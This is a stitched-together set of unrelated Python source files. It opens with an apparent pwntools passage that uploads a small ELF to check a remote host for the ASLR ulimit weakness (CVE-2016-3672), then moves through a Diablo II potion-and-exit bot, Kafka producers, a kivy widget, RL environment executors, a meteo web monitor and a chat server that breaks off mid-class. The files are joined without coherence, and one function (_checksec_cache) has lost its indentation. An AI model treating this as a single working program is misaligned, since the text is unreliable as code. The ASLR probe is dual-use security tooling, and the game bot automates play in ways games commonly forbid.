    with context.local(arch=arch, bits=32, os=self.os, aslr=True):
        with context.quiet:
            try:
                # Tiny 32-bit shared ELF that dumps its own memory map.
                sc = pwnlib.shellcraft.cat('/proc/self/maps') \
                    + pwnlib.shellcraft.exit(0)
                elf = pwnlib.elf.elf.ELF.from_assembly(sc, shared=True)
            except Exception:
                self.warn_once("Can't determine ulimit ASLR status")
                self._aslr_ulimit = False
                return self._aslr_ulimit

    # Runs remotely before exec: lift the stack ulimit to unlimited,
    # which is what (historically) de-randomized 32-bit mappings.
    def preexec():
        import resource
        try:
            resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
        except Exception:
            pass

    # Move to a new temporary directory
    cwd = self.cwd
    tmp = self.set_working_directory()

    try:
        self.upload(elf.path, './aslr-test')
    except IOError:
        self.warn_once("Couldn't check ASLR ulimit trick")
        self._aslr_ulimit = False
        return False

    self.process(['chmod', '+x', './aslr-test']).wait()
    maps = self.process(['./aslr-test'], preexec_fn=preexec).recvall()

    # Move back to the old directory
    self.cwd = cwd

    # Clean up the files
    self.process(['rm', '-rf', tmp]).wait()

    # Check for 555555000 (1/3 of the address space for PAE)
    # and for 40000000 (1/3 of the address space with 3BG barrier)
    self._aslr_ulimit = bool(b'55555000' in maps or b'40000000' in maps)

    return self._aslr_ulimit
def _checksec_cache(self, value=None):
path = self._get_cachefile('%s-%s' % (self.host, self.port))
if value is not None:
with open(path, 'w+') as f:
f.write(value)
elif os.path.exists(path):
with open(path, 'r+') as f:
return f.read()
def checksec(self, banner=True):
    """checksec()

    Prints a helpful message about the remote system.

    Arguments:
        banner(bool): Whether to print the path to the ELF binary.
    """
    # Probing the remote is slow; serve from the per-host cache when possible.
    cached = self._checksec_cache()
    if cached:
        return cached

    red = text.red
    green = text.green

    res = [
        "%s@%s:" % (self.user, self.host),
        # FIX: label previously read "Distro" without the trailing colon,
        # inconsistent with every other label below.
        "Distro:".ljust(10) + ' '.join(self.distro),
        "OS:".ljust(10) + self.os,
        "Arch:".ljust(10) + self.arch,
        "Version:".ljust(10) + '.'.join(map(str, self.version)),
        "ASLR:".ljust(10) + {
            True: green("Enabled"),
            False: red("Disabled")
        }[self.aslr]
    ]

    if self.aslr_ulimit:
        res += [ "Note:".ljust(10) + red("Susceptible to ASLR ulimit trick (CVE-2016-3672)")]

    cached = '\n'.join(res)
    self._checksec_cache(cached)
    return cached
# ===== health_manager.py =====
from template_finder import TemplateFinder
from ui import UiManager
from ui import BeltManager
from pather import Location
import cv2
import time
import keyboard
from utils.custom_mouse import mouse
from utils.misc import cut_roi, color_filter, wait
from logger import Logger
from screen import Screen
import numpy as np
import time
from config import Config
class HealthManager:
    """Background watchdog that inspects screen captures and reacts to low
    player / mercenary health or mana by drinking belt potions, or by
    performing an emergency save & exit ("chicken")."""
    def __init__(self, screen: Screen, template_finder: TemplateFinder):
        self._config = Config()
        self._screen = screen
        self._template_finder = template_finder
        self._ui_manager = UiManager(screen, self._template_finder)
        self._belt_manager = None # must be set with the belt manager from bot.py
        # Loop-control flag for start_monitor()/stop_monitor().
        self._do_monitor = False
        # Set once a chicken was performed; reset via reset_chicken_flag().
        self._did_chicken = False
        # Timestamps used to throttle how often each potion type is drunk.
        self._last_rejuv = time.time()
        self._last_health = time.time()
        self._last_mana = time.time()
        self._last_merc_healh = time.time()
        # One-shot callback fired right before chickening.
        self._callback = None
        # While True the monitor loop idles (e.g. outside boss areas).
        self._pausing = True
        self._last_chicken_screenshot = None

    def stop_monitor(self):
        # Signals the loop in start_monitor() (running in another thread).
        self._do_monitor = False

    def set_belt_manager(self, belt_manager: BeltManager):
        self._belt_manager = belt_manager

    def set_callback(self, callback):
        self._callback = callback

    def did_chicken(self):
        return self._did_chicken

    def reset_chicken_flag(self):
        self._did_chicken = False
        self._pausing = True

    def update_location(self, loc: Location):
        """Activate monitoring only while the location string names a boss
        area; pause everywhere else."""
        if loc is not None and type(loc) == str:
            bosses = ["shenk", "eldritch", "pindle", "nihlatak", "trav", "arc", "diablo"]
            prev_value = self._pausing
            self._pausing = not any(substring in loc for substring in bosses)
            if self._pausing != prev_value:
                debug_str = "pausing" if self._pausing else "active"
                Logger.info(f"Health Manager is now {debug_str}")

    @staticmethod
    def get_health(img: np.ndarray) -> float:
        """Estimate the player health globe fill ratio (0.0 - 1.0) from a
        full-screen capture."""
        config = Config()
        health_rec = [config.ui_pos["health_left"], config.ui_pos["health_top"], config.ui_pos["health_width"], config.ui_pos["health_height"]]
        health_img = cut_roi(img, health_rec)
        # red mask; the red hue wraps around 180, so two ranges are OR'ed
        mask1, _ = color_filter(health_img, [np.array([0, 110, 20]), np.array([2, 255, 255])])
        mask2, _ = color_filter(health_img, [np.array([178, 110, 20]), np.array([180, 255, 255])])
        mask = cv2.bitwise_or(mask1, mask2)
        health_percentage = (float(np.sum(mask)) / mask.size) * (1/255.0)
        # green (in case of poison)
        mask, _ = color_filter(health_img, [np.array([47, 90, 20]), np.array([54, 255, 255])])
        health_percentage_green = (float(np.sum(mask)) / mask.size) * (1/255.0)
        return max(health_percentage, health_percentage_green)

    @staticmethod
    def get_mana(img: np.ndarray) -> float:
        """Estimate the mana globe fill ratio (0.0 - 1.0) via a blue mask."""
        config = Config()
        mana_rec = [config.ui_pos["mana_left"], config.ui_pos["mana_top"], config.ui_pos["mana_width"], config.ui_pos["mana_height"]]
        mana_img = cut_roi(img, mana_rec)
        mask, _ = color_filter(mana_img, [np.array([117, 120, 20]), np.array([121, 255, 255])])
        mana_percentage = (float(np.sum(mask)) / mask.size) * (1/255.0)
        return mana_percentage

    @staticmethod
    def get_merc_health(img: np.ndarray) -> float:
        """Estimate the mercenary health bar fill ratio (0.0 - 1.0)."""
        config = Config()
        health_rec = [config.ui_pos["merc_health_left"], config.ui_pos["merc_health_top"], config.ui_pos["merc_health_width"], config.ui_pos["merc_health_height"]]
        merc_health_img = cut_roi(img, health_rec)
        merc_health_img = cv2.cvtColor(merc_health_img, cv2.COLOR_BGR2GRAY)
        # Any pixel brighter than 5 counts as "filled" bar.
        _, health_tresh = cv2.threshold(merc_health_img, 5, 255, cv2.THRESH_BINARY)
        merc_health_percentage = (float(np.sum(health_tresh)) / health_tresh.size) * (1/255.0)
        return merc_health_percentage

    def _do_chicken(self, img):
        """Perform the emergency save & exit, releasing any held inputs."""
        if self._callback is not None:
            self._callback()
            self._callback = None
        if self._config.general["info_screenshots"]:
            self._last_chicken_screenshot = "./info_screenshots/info_debug_chicken_" + time.strftime("%Y%m%d_%H%M%S") + ".png"
            cv2.imwrite(self._last_chicken_screenshot, img)
        # clean up key presses that might be pressed in the run_thread
        keyboard.release(self._config.char["stand_still"])
        wait(0.02, 0.05)
        keyboard.release(self._config.char["show_items"])
        wait(0.02, 0.05)
        mouse.release(button="left")
        wait(0.02, 0.05)
        mouse.release(button="right")
        time.sleep(0.01)
        self._ui_manager.save_and_exit(does_chicken=True)
        self._did_chicken = True
        self._pausing = True

    def start_monitor(self):
        """Blocking monitor loop; intended to run in its own thread."""
        Logger.info("Start health monitoring")
        self._do_monitor = True
        self._did_chicken = False
        start = time.time()
        while self._do_monitor:
            time.sleep(0.1)
            # Wait until the flag is reset by main.py
            if self._did_chicken or self._pausing: continue
            img = self._screen.grab()
            # TODO: Check if in town or not! Otherwise risk endless chicken loop
            ingame_template_match = self._template_finder.search("WINDOW_INGAME_OFFSET_REFERENCE", img, roi=self._config.ui_roi["window_ingame_ref"], threshold=0.9)
            if ingame_template_match.valid:
                health_percentage = self.get_health(img)
                mana_percentage = self.get_mana(img)
                # check rejuv
                success_drink_rejuv = False
                last_drink = time.time() - self._last_rejuv
                if (health_percentage < self._config.char["take_rejuv_potion_health"] and last_drink > 1) or \
                   (mana_percentage < self._config.char["take_rejuv_potion_mana"] and last_drink > 2):
                    success_drink_rejuv = self._belt_manager.drink_potion("rejuv", stats=[health_percentage, mana_percentage])
                    self._last_rejuv = time.time()
                # in case no rejuv was used, check for chicken, health pot and mana pot usage
                if not success_drink_rejuv:
                    # check health
                    last_drink = time.time() - self._last_health
                    if health_percentage < self._config.char["take_health_potion"] and last_drink > 3.5:
                        self._belt_manager.drink_potion("health", stats=[health_percentage, mana_percentage])
                        self._last_health = time.time()
                    # give the chicken a 6 sec delay to give time for a healing pot and avoid endless loop of chicken
                    elif health_percentage < self._config.char["chicken"] and (time.time() - start) > 6:
                        Logger.warning(f"Trying to chicken, player HP {(health_percentage*100):.1f}%!")
                        self._do_chicken(img)
                    # check mana
                    last_drink = time.time() - self._last_mana
                    if mana_percentage < self._config.char["take_mana_potion"] and last_drink > 4:
                        self._belt_manager.drink_potion("mana", stats=[health_percentage, mana_percentage])
                        self._last_mana = time.time()
                # check merc
                merc_alive = self._template_finder.search(["MERC_A2","MERC_A1","MERC_A5","MERC_A3"], img, roi=self._config.ui_roi["merc_icon"]).valid
                if merc_alive:
                    merc_health_percentage = self.get_merc_health(img)
                    last_drink = time.time() - self._last_merc_healh
                    if merc_health_percentage < self._config.char["merc_chicken"]:
                        Logger.warning(f"Trying to chicken, merc HP {(merc_health_percentage*100):.1f}%!")
                        self._do_chicken(img)
                    if merc_health_percentage < self._config.char["heal_rejuv_merc"] and last_drink > 4.0:
                        self._belt_manager.drink_potion("rejuv", merc=True, stats=[merc_health_percentage])
                        self._last_merc_healh = time.time()
                    elif merc_health_percentage < self._config.char["heal_merc"] and last_drink > 7.0:
                        self._belt_manager.drink_potion("health", merc=True, stats=[merc_health_percentage])
                        self._last_merc_healh = time.time()
        Logger.debug("Stop health monitoring")
# Testing: Start dying or losing mana and see if it works
if __name__ == "__main__":
    import threading
    import keyboard
    import os
    # f12 hard-exits the whole process (os._exit skips cleanup handlers).
    keyboard.add_hotkey('f12', lambda: Logger.info('Exit Health Manager') or os._exit(1))
    config = Config()
    screen = Screen(config.general["monitor"])
    template_finder = TemplateFinder(screen)
    belt_manager = BeltManager(screen, template_finder)
    manager = HealthManager(screen, template_finder)
    manager.set_belt_manager(belt_manager)
    # Force monitoring active (normally gated by update_location()).
    manager._pausing = False
    Logger.info("Press f12 to exit health manager")
    # Monitor runs in a background thread; the main thread polls for the
    # chicken flag and shuts down once it fires.
    health_monitor_thread = threading.Thread(target=manager.start_monitor)
    health_monitor_thread.start()
    while 1:
        if manager.did_chicken():
            manager.stop_monitor()
            health_monitor_thread.join()
            break
        wait(0.5)
# ===== producers.py =====
import asyncio
import threading
from abc import ABC, abstractmethod
from confluent_kafka import SerializingProducer, Producer, KafkaException
from confluent_kafka.schema_registry import SchemaRegistryClient
from confluent_kafka.schema_registry.json_schema import JSONSerializer
from confluent_kafka.serialization import StringSerializer
from app.models import BetDataList
import app.settings as config
from app.utils.advanced_scheduler import async_repeat_deco
class GenericProducer(ABC):
    """Abstract base for Kafka producers.

    Subclasses supply the JSON schema, model serialization and produce()
    logic; this base class owns the underlying confluent-kafka producer and
    the background thread that services delivery callbacks via poll().
    """
    bootstrap_servers = config.broker_settings.broker
    schema_registry_conf = {'url': config.broker_settings.schema_registry}
    # bootstrap_servers = 'localhost:9092'
    # schema_registry_conf = {'url': 'http://localhost:8081'}

    @abstractmethod
    def model_to_dict(self, obj, ctx):
        """Convert a model instance into a dict for JSON serialization."""
        ...

    @property
    @abstractmethod
    def schema(self):
        """JSON schema string used by the serializer (or None)."""
        ...

    @abstractmethod
    def produce(self, id, value, headers) -> asyncio.Future:
        """Asynchronously produce a message; the future resolves on delivery."""
        ...

    def _produce_data(self):
        # Polling drives delivery callbacks until close() flips the flag.
        while not self._cancelled:
            self._producer.poll(0.1)

    def produce_data(self):
        """Start the background polling thread (safe to call repeatedly)."""
        if self._polling_thread.is_alive():
            return
        if self._polling_thread.ident is not None:
            # FIX: a finished Thread object can never be start()ed again;
            # after close()/reset_state() we must create a fresh one
            # instead of raising "threads can only be started once".
            self._polling_thread = threading.Thread(target=self._produce_data)
        self._polling_thread.start()

    def close(self):
        """Stop the polling thread."""
        self._cancelled = True
        # FIX: join() on a thread that was never started raises
        # RuntimeError; only join once it has actually run.
        if self._polling_thread.ident is not None:
            self._polling_thread.join()

    def reset_state(self):
        """Re-arm the producer after a close() so polling can resume."""
        self._cancelled = False

    def __init__(self, loop=None, normal_prod=False):
        """normal_prod=True uses a plain Producer; otherwise a
        SerializingProducer wired to the schema registry."""
        if not normal_prod:
            schema_registry_client = SchemaRegistryClient(self.schema_registry_conf)
            json_serializer = JSONSerializer(self.schema, schema_registry_client, to_dict=self.model_to_dict)
            producer_conf = {'bootstrap.servers': self.bootstrap_servers,
                             'key.serializer': StringSerializer('utf_8'),
                             'value.serializer': json_serializer
                             }
        else:
            producer_conf = {'bootstrap.servers': self.bootstrap_servers}

        self._loop = loop or asyncio.get_event_loop()
        if not normal_prod:
            self._producer = SerializingProducer(producer_conf)
        else:
            self._producer = Producer(producer_conf)
        self._polling_thread = threading.Thread(target=self._produce_data)
        self._cancelled = False
class CsvGenProducer(GenericProducer):
    """Producer for the csv-gen reply channel (plain, schema-less producer)."""

    topic = 'csv-gen-reply'

    def model_to_dict(self, obj: BetDataList, ctx):
        # Schema-based serialization is not used by this producer.
        return None

    @property
    def schema(self):
        # No JSON schema: this producer runs as a plain Producer.
        return None

    def produce(self, id, value, headers=None) -> asyncio.Future:
        """Publish ``value`` under key ``id``; the returned future is resolved
        (or failed) from the broker's delivery callback."""
        fut = self._loop.create_future()

        def on_delivery(err, msg):
            """ Called once for each message produced to indicate delivery result.
            Triggered by poll() or flush(). """
            if err is None:
                print('Message delivered to {} [{}]'.format(msg.topic(), msg.partition()))
                self._loop.call_soon_threadsafe(fut.set_result, msg)
            else:
                print('Message delivery failed: {}'.format(err))
                self._loop.call_soon_threadsafe(fut.set_exception, KafkaException(err))

        self._producer.produce(topic=self.topic, key=id, value=value,
                               on_delivery=on_delivery, headers=headers)
        return fut
# Module-level singleton, assigned by init_producers().
csv_gen_producer: CsvGenProducer

def init_producers():
    # Schedules producer initialization on the running event loop; each
    # initializer is retried (3 attempts, 3s apart) by async_repeat_deco.
    @async_repeat_deco(3, 3, always_reschedule=True)
    async def init_csv_gen_producer(_):
        global csv_gen_producer
        csv_gen_producer = CsvGenProducer(asyncio.get_running_loop(), normal_prod=True)
        csv_gen_producer.produce_data()

    @async_repeat_deco(3, 3, always_reschedule=True)
    async def init_betdata_finish_producer(_):
        # NOTE(review): this initializer is defined but never scheduled below,
        # and BetDataFinishProducer is not defined or imported in this module --
        # either dead code or a missing run_coroutine_threadsafe call; confirm.
        global bet_data_finish_producer
        bet_data_finish_producer = BetDataFinishProducer(asyncio.get_running_loop(), normal_prod=True)
        bet_data_finish_producer.produce_data()

    asyncio.run_coroutine_threadsafe(init_csv_gen_producer('csv_gen_producer'), loop=asyncio.get_running_loop())

def close_producers():
    # Stops the csv-gen producer's polling thread.
    csv_gen_producer.close()
|
bang.py | from kivy import graphics
from kivy.uix.label import Label
import threading
import time
STATES = 'normal', 'down'
class Bang(Label):
    """A label that flashes a cyan rectangle behind itself for `delay`
    seconds each time bang() is called. State changes are guarded by an RLock
    because bang() and the timer thread both touch target_time/_state."""

    def __init__(self, text, delay=0.25, **kwds):
        super().__init__(text=text, **kwds)
        self.delay = delay  # seconds the flash stays visible
        self.lock = threading.RLock()
        self._state = False  # goes through the setter, also initializing self.state

    @property
    def _state(self):
        # True while the widget is in the 'down' (flashing) state.
        return self.state == STATES[1]

    @_state.setter
    def _state(self, state):
        self.state = STATES[bool(state)]
        self.on_size()  # repaint immediately on every state change

    def bang(self):
        """Trigger the flash, or extend it if one is already running."""
        with self.lock:
            # Pushing target_time forward extends a flash in progress.
            self.target_time = time.time() + self.delay
            if not self._state:
                self._state = True
                threading.Thread(target=self._target, daemon=True).start()

    def on_size(self, *args):
        # Redraw the background rectangle (drawn only while flashing).
        self.canvas.clear()
        if self._state:
            with self.canvas:
                graphics.Color(0, 1, 1)
                graphics.Rectangle(pos=self.pos, size=self.size)

    def _target(self):
        # Timer thread: sleep until target_time (which bang() may keep pushing
        # forward), then clear the flashing state and exit.
        while True:
            with self.lock:
                remains = self.target_time - time.time()
                if remains <= 0:
                    self._state = False
                    break
            time.sleep(remains)
|
vectorized_env_executor.py | import numpy as np
import pickle as pickle
from multiprocessing import Process, Pipe
import copy
class IterativeEnvExecutor(object):
    """
    Wraps multiple copies of the same environment and exposes vectorized
    reset / step. The copies are stepped one after another (no parallelism).
    """

    def __init__(self, env, num_rollouts, max_path_length):
        self._num_envs = num_rollouts
        self.envs = np.asarray([copy.deepcopy(env) for _ in range(num_rollouts)])
        self.ts = np.zeros(num_rollouts, dtype='int')  # per-env step counters
        self.max_path_length = max_path_length

    def step(self, actions):
        """
        Step every wrapped environment with its corresponding action.

        Args:
            actions (list): one action per environment
                            (length meta_batch_size x envs_per_task).

        Returns:
            (tuple): lists obs (np.array), rewards (float), dones (bool),
            env_infos (dict), each of length num_envs. Environments that
            finished (done, or max_path_length reached) are reset in place.
        """
        assert len(actions) == self.num_envs
        stepped = [env.step(act) for act, env in zip(actions, self.envs)]
        obs, rewards, dones, env_infos = map(list, zip(*stepped))
        self.ts += 1
        dones = np.logical_or(np.asarray(dones), self.ts >= self.max_path_length)
        for idx in np.argwhere(dones).flatten():
            obs[idx] = self.envs[idx].reset()
            self.ts[idx] = 0
        return obs, rewards, dones, env_infos

    def reset(self):
        """
        Reset all wrapped environments.

        Returns:
            (list): new initial observations, one per environment.
        """
        self.ts[:] = 0
        return [env.reset() for env in self.envs]

    @property
    def num_envs(self):
        """
        Number of wrapped environments.

        Returns:
            (int): number of environments
        """
        return self._num_envs
class ParallelEnvExecutor(object):
    """
    Wraps multiple environments of the same kind and provides functionality to reset / step the environments
    in a vectorized manner. Thereby the environments are distributed among meta_batch_size processes and
    executed in parallel.
    """

    def __init__(self, env, n_parallel, num_rollouts, max_path_length):
        # Each worker process runs num_rollouts / n_parallel env copies.
        assert num_rollouts % n_parallel == 0
        self.envs_per_proc = int(num_rollouts/n_parallel)
        self._num_envs = n_parallel * self.envs_per_proc
        self.n_parallel = n_parallel
        # One pipe per worker: `remotes` are the parent-side ends,
        # `work_remotes` are handed to the child processes.
        self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(n_parallel)])
        seeds = np.random.choice(range(10**6), size=n_parallel, replace=False)
        self.ps = [
            Process(target=worker, args=(work_remote, remote, pickle.dumps(env), self.envs_per_proc, max_path_length, seed))
            for (work_remote, remote, seed) in zip(self.work_remotes, self.remotes, seeds)]  # parent end is passed so the child can close its inherited copy
        for p in self.ps:
            p.daemon = True  # if the main process crashes, we should not cause things to hang
            p.start()
        # Close the parent's copies of the child-side pipe ends so EOF
        # propagates correctly when a worker dies.
        for remote in self.work_remotes:
            remote.close()

    def step(self, actions):
        """
        Executes actions on each env

        Args:
            actions (list): lists of actions, of length meta_batch_size x envs_per_task

        Returns
            (tuple): a length 4 tuple of lists, containing obs (np.array), rewards (float), dones (bool), env_infos (dict)
            each list is of length meta_batch_size x envs_per_task (assumes that every task has same number of meta_envs)
        """
        assert len(actions) == self.num_envs
        # split list of actions in list of list of actions per meta tasks
        chunks = lambda l, n: [l[x: x + n] for x in range(0, len(l), n)]
        actions_per_meta_task = chunks(actions, self.envs_per_proc)
        # step remote environments
        for remote, action_list in zip(self.remotes, actions_per_meta_task):
            remote.send(('step', action_list))
        # each worker replies with per-env lists; flatten them back together
        results = [remote.recv() for remote in self.remotes]
        obs, rewards, dones, env_infos = map(lambda x: sum(x, []), zip(*results))
        return obs, rewards, dones, env_infos

    def reset(self):
        """
        Resets the environments of each worker

        Returns:
            (list): list of (np.ndarray) with the new initial observations.
        """
        for remote in self.remotes:
            remote.send(('reset', None))
        return sum([remote.recv() for remote in self.remotes], [])

    def set_tasks(self, tasks=None):
        """
        Sets a list of tasks to each worker

        Args:
            tasks (list): list of the tasks for each worker
        """
        for remote, task in zip(self.remotes, tasks):
            remote.send(('set_task', task))
        # wait for every worker to acknowledge before returning
        for remote in self.remotes:
            remote.recv()

    @property
    def num_envs(self):
        """
        Number of environments

        Returns:
            (int): number of environments
        """
        return self._num_envs
def worker(remote, parent_remote, env_pickle, n_envs, max_path_length, seed):
    """
    Instantiation of a parallel worker for collecting samples. It loops continually checking the task that the remote
    sends to it.

    Args:
        remote (multiprocessing.Connection): child-side pipe end used for all communication
        parent_remote (multiprocessing.Connection): inherited parent end; closed immediately
        env_pickle (pkl): pickled environment
        n_envs (int): number of environments per worker
        max_path_length (int): maximum path length of the task
        seed (int): random seed for the worker
    """
    # Close the inherited parent end so only the parent process holds it.
    parent_remote.close()
    envs = [pickle.loads(env_pickle) for _ in range(n_envs)]
    np.random.seed(seed)
    # per-env step counters, used to enforce max_path_length
    ts = np.zeros(n_envs, dtype='int')
    while True:
        # receive command and data from the remote
        cmd, data = remote.recv()
        # do a step in each of the environment of the worker
        if cmd == 'step':
            all_results = [env.step(a) for (a, env) in zip(data, envs)]
            obs, rewards, dones, infos = map(list, zip(*all_results))
            ts += 1
            # auto-reset environments that finished or exhausted the horizon
            for i in range(n_envs):
                if dones[i] or (ts[i] >= max_path_length):
                    dones[i] = True
                    obs[i] = envs[i].reset()
                    ts[i] = 0
            remote.send((obs, rewards, dones, infos))
        # reset all the environments of the worker
        elif cmd == 'reset':
            obs = [env.reset() for env in envs]
            ts[:] = 0
            remote.send(obs)
        # set the specified task for each of the environments of the worker
        elif cmd == 'set_task':
            for env in envs:
                env.set_task(data)
            remote.send(None)  # acknowledge completion to the parent
        # close the remote and stop the worker
        elif cmd == 'close':
            remote.close()
            break
        else:
            raise NotImplementedError
|
webmonitoring.py | import logging
from threading import Thread
import datetime as dt
from datetime import datetime
import dateutil.parser as dp
from plot import plotMeteoStuff
from shellchecks import *
import time
import cherrypy
import signal
import socket
import sys
import os
import meteo
import plot
# --- module configuration -------------------------------------------------
plots_path = 'plots/'                 # where generated plot images are written
daq_path = '/data/DAQ/'               # DAQ data root (used by the legacy Root.loadStatus path)
db_path = './conditions_db.sqlite'    # sqlite DB for meteo records
update_time = 60  # seconds between control-loop iterations (also page refresh)

# for connection to the meteo station
sock = socket.socket(socket.AF_INET,  # Internet
                     socket.SOCK_DGRAM)  # UDP
server_address = ("172.16.32.127", 5143)

# for writing to DB
meteo.initDB(db_path)

# init logging
# Create a custom logger
logger = logging.getLogger('web_monitoring')
log_file_name = 'conditions_monitoring_' + time.strftime('%d-%m-%Y_%H-%M') + '.log'
logging.basicConfig(filename=log_file_name, level=logging.DEBUG,
                    format = '%(asctime)s - [%(name)s] %(levelname)s: %(message)s',
                    datefmt = '%m/%d/%Y %I:%M:%S %p')

# Shared mutable state: written by the control loop (see __main__) and the
# check functions; read by the CherryPy Root.index handler.
state = {
    "x" : 0,                   # loop iteration counter
    "meteo_data" : [],         # records fetched for plotting
    "meteo_time_offset" : 0,   # in seconds
    "readout_time" : None      # datetime of the last successful readout
}
def readMeteoStation():
    """Query the meteo station over UDP and return the raw reply.

    Returns:
        The received payload, or None if the exchange failed.
    """
    try:
        # Fix: sockets require bytes -- sending a str raises TypeError on Python 3.
        sock.sendto(b"Q", server_address)
        data = sock.recv(1024)  # buffer size is 1024 bytes
        # Fix: lazy %-formatting instead of str + bytes concatenation
        # (the old form raised TypeError on Python 3).
        logger.debug("Received data from meteo server: %s", data.strip())
        return data
    except Exception:
        # Fix: narrowed from a bare except (which also swallowed
        # KeyboardInterrupt/SystemExit). Returns None implicitly on failure.
        logger.error("In connection to meteo station: " + str(sys.exc_info()[0]))
def checkMeteoStation(S):
    # Read one record from the station and persist it to the sqlite DB;
    # also updates S["meteo_time_offset"] with the clock skew.
    line = readMeteoStation()
    read_time = datetime.now()
    data = meteo.writeRecord(line, read_time, 'zyx')
    logger.debug("Written data to DB: " + str(data))
    # check time offset between meteo028 PC and server
    # NOTE(review): local `dt` shadows the module alias `import datetime as dt`;
    # harmless within this function but easy to trip over when editing.
    dt = dp.parse(data[0]) - read_time
    S["meteo_time_offset"] = dt.total_seconds()
def getDataForPlots(S):
    # Load the last 24 hours of records into the shared state for plotting.
    now = datetime.now()
    retro_shift = dt.timedelta(days=-1)
    S["meteo_data"] = meteo.getRecordsSince(now + retro_shift)

def makePlots(S):
    # Render the plot images consumed by the web page (plots/*.png).
    plot.plotMeteoStuff(S["meteo_data"], plots_path)

# Checks executed in order on every control-loop iteration (see __main__);
# each receives the shared `state` dict.
checks = (
    checkMeteoStation,
    getDataForPlots,
    makePlots
)
class Root(object):
    """CherryPy application root: renders the monitoring status page."""

    def __init__(self):
        self.last_readout = 0    # unix time of the last DAQ readout
        self.recent_folder = ""
        self.recent_file = ""

    def loadStatus(self, current_time):
        # NOTE(review): legacy readout path -- no longer called from index();
        # kept together with the commented-out DAQ status block below.
        if( abs(current_time - self.last_readout) < 120 ):
            #if last readout was closer than 120 s, do not read out again
            return self.last_readout
        # if last readout was older, read out all relevant parameters
        #
        file = getMeteoLogFile()
        plotMeteoStuff(file, plots_path)
        file.close()
        #
        self.recent_folder = getMostRecentFolder(daq_path, '????.??.??_????')
        self.recent_file = getMostRecentFile(self.recent_folder[1])
        self.last_readout = current_time
        return current_time

    @cherrypy.expose
    def index(self):
        # Render the status page from the shared `state` dict (filled by the
        # control loop in __main__); the page auto-refreshes every update_time s.
        global state
        if state["readout_time"] is not None:
            readout_time = state["readout_time"].strftime('%Y-%m-%d %H:%M:%S')
        else:
            readout_time = 'No readouts.'
        s = """
        <HTML>
        <HEAD>
        <TITLE>J-PET Monitoring</TITLE>
        <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
        <meta http-equiv="Pragma" content="no-cache" />
        <meta http-equiv="Expires" content="0" />
        <meta http-equiv="refresh" content="%d">
        </HEAD>
        <BODY BGCOLOR="FFFFFF">
        <DIV><h2>Status at: %s (last readout time)</h2></DIV>
        <CENTER>
        <IMG SRC="./plots/temp.png" ALIGN="BOTTOM">
        <IMG SRC="./plots/pressure.png" ALIGN="BOTTOM">
        <IMG SRC="./plots/patm.png" ALIGN="BOTTOM">
        <IMG SRC="./plots/humidities.png" ALIGN="BOTTOM">
        </CENTER>
        <DIV><h3>Time difference between server and meteo PC: %d seconds</h3></DIV>
        </BODY>
        </HTML>
        """ % (update_time,
               readout_time,
               state["meteo_time_offset"],)
        # self.recent_folder[1],
        # os.path.basename(self.recent_file[1]),
        # str(int(current_time-self.recent_file[0]))
        # )
        # <DIV><h3>Most recent folder %s</h3></DIV>
        # <DIV><h3>Most recent HLD file %s</h3></DIV>
        # <DIV><h3>Last access %s seconds ago</h3></DIV>
        return s
if __name__ == '__main__':
    # CherryPy configuration: sessions plus static serving of the plots dir.
    conf = {
        'global': {
            # Remove this to auto-reload code on change and output logs
            # directly to the console (dev mode).
            # 'environment': 'production',
        },
        '/': {
            'tools.sessions.on': True,
            'tools.sessions.timeout': 60 * 10, # minutes -> 10 hours
        },
        '/plots': {
            "tools.staticdir.on": True,
            "tools.staticdir.dir": "plots",
            "tools.staticdir.index": 'index.html',
            "tools.staticdir.root": os.getcwd(),
        }
    }
    # Take care of signal handling
    def signal_handler(sig, frame):
        # Ctrl+C: close the meteo socket, stop CherryPy, exit cleanly.
        print('You pressed Ctrl+C!')
        logger.info("SIGINT received, cleaning up and exiting.")
        sock.close()
        cherrypy.engine.exit()
        sys.exit(0)
    signal.signal(signal.SIGINT, signal_handler)
    # Start the server with the above app and the above config.
    def thread1(threadname):
        # HTTP server thread body: mounts the app and blocks on the engine.
        cherrypy.tree.mount(Root(), '/', conf)
        cherrypy.config.update({'server.socket_host': '0.0.0.0', })
        cherrypy.config.update({'server.socket_port': 8000, })
        cherrypy.config.update({'log.screen': False,
                                'log.access_file': '',
                                'log.error_file': ''})
        cherrypy.engine.start()
        cherrypy.engine.block()
    # thread of the HTTP server
    thread1 = Thread( target=thread1, args=("HTTP Server thread", ) )
    thread1.daemon = True
    thread1.start()
    # control event loop
    # NOTE(review): an exception from any check kills the whole service --
    # consider guarding the loop body.
    while True:
        state["x"] = state["x"] + 1
        for f in checks:
            f(state)
        state["readout_time"] = datetime.now()
        time.sleep(update_time)
|
server.py | #!/usr/bin/env python3
import threading
import socket
from time import gmtime, strftime, sleep
import os
connectionDictionary = {}  # dictionary where to put all connection threads in
currentTime = ''  # variable for displaying the current time in logs
halt = False  # indicator variable for program shutdown

# building socket
# Listening TCP socket: all interfaces, port 2018, backlog of 10.
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(("0.0.0.0", 2018))
server_socket.listen(10)
class connectedHost(threading.Thread):
    """One chat client connection, running as its own thread.

    NOTE(review): the username handshake runs in __init__, i.e. on the accept
    thread -- a slow client blocks new connections; confirm whether moving it
    into run() is acceptable before restructuring.
    """

    def __init__(self, connection, address, iD):
        self.connection = connection
        self.ip, self.port = address
        self.id = iD
        # Fix: initialize before any early return so broadcast()/ls()/
        # getConnectedIPs() never hit AttributeError on a half-constructed
        # connection (previously unset on the %exit path).
        self.isonline = False
        if self.ip in getConnectedIPs():
            self.rejectConnection("You are already connected with this IP")
            return
        # Handshake: wait for a %setusername command from the client.
        while not halt:
            username = str(self.connection.recv(2048), "utf8")
            username = cliInterpretor(username)
            # Fix: an empty recv means the client disconnected; bail out
            # instead of raising IndexError on username[0].
            if not username or username[0] == "%exit":
                return
            elif username[0] == "%setusername":
                if len(username) < 2:
                    continue
                self.username = username[1]
                break
        if not hasattr(self, "username"):
            # Server went into shutdown before the handshake finished.
            return
        self.isonline = True
        self.broadcast(self.username + " is online")
        print(self.username + " is online on " + self.ip + ":" + str(self.port) + " with PID " + str(self.id))
        # Thread base class is only initialized for fully handshaken
        # connections; start() on a rejected one raises RuntimeError,
        # which acceptConnections() handles.
        threading.Thread.__init__(self)
